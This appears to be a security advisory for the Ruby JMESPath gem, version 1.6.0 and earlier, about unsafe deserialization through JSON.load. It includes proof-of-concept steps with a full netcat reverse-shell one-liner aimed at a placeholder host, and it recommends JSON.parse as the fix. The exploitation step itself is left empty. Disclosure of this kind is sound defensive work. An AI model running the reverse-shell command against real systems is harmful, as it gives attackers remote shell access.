Description

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.

Proof-of-concept

1. In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:

2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:

irb

3. In case you don’t have ‘irb’ installed then use the following command to download the same:

gem install IRB

4. Pick the desired payload, I have picked one from pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:

Conclusion

It is recommended to use JSON.parse instead of JSON.load . In this case, we observed that the JSON.load has failed to validate the input data which leads to Remote Code Execution.